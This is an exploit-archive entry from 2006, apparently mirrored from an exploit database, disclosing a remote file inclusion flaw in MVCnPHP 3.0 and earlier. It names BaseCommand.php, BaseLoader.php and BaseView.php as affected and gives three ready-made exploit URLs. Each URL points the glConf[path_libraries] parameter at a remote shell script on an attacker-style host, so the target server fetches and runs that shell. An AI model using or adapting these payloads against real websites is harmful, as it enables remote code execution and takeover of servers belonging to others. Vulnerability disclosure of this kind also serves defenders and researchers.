MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities
# Published : 2006-08-10
# Author : Drago84
# Previous Title : Mambo Remository Component <= 3.25 Remote Include Vulnerability
# Next Title : Boite de News <= 4.0.1 (index.php) Remote File Inclusion Vulnerability

MVCnPHP Remote File Inclusion

############ToXiC CrEw###############

Bug Found by Drago84

Page  Sources:
http://freshmeat.net/redir/mvcnphp/46123/url_tgz/Geeklog_MVCnPHP-3.0.0.tgz

Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php

ExP:
http://www.sito.com/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php

# www.Syue.com [2006-08-10]